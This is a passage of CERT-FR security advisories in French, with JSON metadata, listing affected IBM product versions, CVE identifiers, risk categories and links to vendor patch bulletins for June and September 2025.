"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2018-14720",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14720"
},
{
"name": "CVE-2024-47176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47176"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2023-52922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52922"
},
{
"name": "CVE-2019-14540",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14540"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2018-14721",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14721"
},
{
"name": "CVE-2018-11307",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11307"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-41091",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41091"
},
{
"name": "CVE-2024-35152",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35152"
},
{
"name": "CVE-2019-14379",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14379"
},
{
"name": "CVE-2025-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25032"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2024-47175",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47175"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2023-39663",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39663"
},
{
"name": "CVE-2024-35136",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35136"
},
{
"name": "CVE-2022-25168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25168"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-14892",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14892"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0512",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-12",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236500",
"url": "https://www.ibm.com/support/pages/node/7236500"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234674",
"url": "https://www.ibm.com/support/pages/node/7234674"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236354",
"url": "https://www.ibm.com/support/pages/node/7236354"
}
]
}
CERTFR-2025-AVI-0760
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar SIEM | User Entity Behavior Analytics pour IBM QRadar SIEM versions antérieures à 5.0.1 | ||
| IBM | Db2 | Db2 on Cloud Pak for Data versions antérieures à v5.2.1 | ||
| IBM | Db2 | Db2 Warehouse on Cloud Pak for Data versions antérieures à v5.2.1 | ||
| IBM | WebSphere | WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalités jsonp sans le dernier correctif de sécurité | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty ART versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | WebSphere | WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité APAR PH67137, APAR PH67132, | ||
| IBM | WebSphere | Cloud Pak for Applications versions 5.1 à 5.3 pour WebSphere Application Server Liberty sans les correctifs de sécurité APAR PH67132 et APAR PH67137 | ||
| IBM | WebSphere | IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de sécurité APAR PH67137 et APAR PH67132 | ||
| IBM | WebSphere | Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "User Entity Behavior Analytics pour IBM QRadar SIEM versions ant\u00e9rieures \u00e0 5.0.1",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalit\u00e9s jsonp sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty ART versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 APAR PH67137, APAR PH67132,",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Applications versions 5.1 \u00e0 5.3 pour WebSphere Application Server Liberty sans les correctifs de s\u00e9curit\u00e9 APAR PH67132 et APAR PH67137",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de s\u00e9curit\u00e9 APAR PH67137 et APAR PH67132",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-31129",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31129"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2023-43642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43642"
},
{
"name": "CVE-2025-0755",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0755"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-51473",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51473"
},
{
"name": "CVE-2015-5237",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-5237"
},
{
"name": "CVE-2025-3445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3445"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2025-46762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46762"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2016-4055",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4055"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2025-30472",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30472"
},
{
"name": "CVE-2025-24528",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24528"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2022-36364",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36364"
},
{
"name": "CVE-2023-5868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5868"
},
{
"name": "CVE-2025-48050",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48050"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-33092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33092"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2025-1647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1647"
},
{
"name": "CVE-2023-39417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39417"
},
{
"name": "CVE-2023-34462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34462"
},
{
"name": "CVE-2024-0406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0406"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2025-33143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33143"
},
{
"name": "CVE-2021-3393",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3393"
},
{
"name": "CVE-2025-2533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2533"
},
{
"name": "CVE-2019-10202",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10202"
},
{
"name": "CVE-2023-5870",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2025-36097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36097"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2025-36010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36010"
},
{
"name": "CVE-2025-36047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36047"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2025-32462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32462"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2023-5869",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5869"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2024-48949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48949"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2025-33114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33114"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2022-41862",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41862"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-21966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21966"
},
{
"name": "CVE-2023-22467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22467"
},
{
"name": "CVE-2022-24823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24823"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2019-9193",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9193"
},
{
"name": "CVE-2018-5968",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5968"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2025-37799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37799"
},
{
"name": "CVE-2022-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24785"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2023-26133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26133"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2023-2454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2454"
},
{
"name": "CVE-2024-9823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9823"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-56339",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56339"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2022-1552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1552"
},
{
"name": "CVE-2024-49828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49828"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2017-18214",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18214"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-2455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-5702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5702"
},
{
"name": "CVE-2025-36071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36071"
},
{
"name": "CVE-2025-37749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37749"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2017-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15095"
},
{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2019-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12086"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2023-52933",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52933"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2024-12243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2022-2625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2625"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2017-17485",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-17485"
},
{
"name": "CVE-2024-6762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6762"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2024-52894",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52894"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2025-21887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21887"
},
{
"name": "CVE-2025-6442",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6442"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2024-51504",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51504"
},
{
"name": "CVE-2022-41881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41881"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-21756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21756"
},
{
"name": "CVE-2018-1000873",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000873"
},
{
"name": "CVE-2023-32305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32305"
},
{
"name": "CVE-2025-47287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
},
{
"name": "CVE-2025-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3576"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0760",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-09-05T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243927",
"url": "https://www.ibm.com/support/pages/node/7243927"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243923",
"url": "https://www.ibm.com/support/pages/node/7243923"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243924",
"url": "https://www.ibm.com/support/pages/node/7243924"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244012",
"url": "https://www.ibm.com/support/pages/node/7244012"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243659",
"url": "https://www.ibm.com/support/pages/node/7243659"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244002",
"url": "https://www.ibm.com/support/pages/node/7244002"
},
{
"published_at": "2025-08-29",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243582",
"url": "https://www.ibm.com/support/pages/node/7243582"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243928",
"url": "https://www.ibm.com/support/pages/node/7243928"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243925",
"url": "https://www.ibm.com/support/pages/node/7243925"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244010",
"url": "https://www.ibm.com/support/pages/node/7244010"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243922",
"url": "https://www.ibm.com/support/pages/node/7243922"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243673",
"url": "https://www.ibm.com/support/pages/node/7243673"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243877",
"url": "https://www.ibm.com/support/pages/node/7243877"
}
]
}
CERTFR-2025-AVI-0746
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling External Authentication Server versions 6.1.0.x antérieures à 6.1.0.3 GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.1.0.x antérieures à 6.1.0.2 GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.2.0.x antérieures à 6.2.0.2 GA | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.3.x antérieures à 6.3.0.6 | ||
| IBM | Sterling | Sterling Connect:Direct pour Microsoft Windows versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | Db2 | Db2 Bridge versions antérieures à 1.1.1 | ||
| IBM | Cognos Dashboards | Cognos Command Center versions 10.2.4.1 et 10.2.5 antérieures à 10.2.5 FP1 IF1 | ||
| IBM | QRadar | QRadar SIEM versions 7.5.0 antérieures à QRadar 7.5.0 UP13 IF01 | ||
| IBM | QRadar | QRadar Incident Forensics versions 7.5.0 antérieures à QIF 7.5.0 UP13 IF01 | ||
| IBM | WebSphere | WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de sécurité | ||
| IBM | Cognos Dashboards | Cognos Dashboards on Cloud Pak for Data versions 5.x antérieures à 5.2.1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling External Authentication Server versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.3 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.2 GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.2.0.x ant\u00e9rieures \u00e0 6.2.0.2 GA",
"product": {
"name": "Sterling",
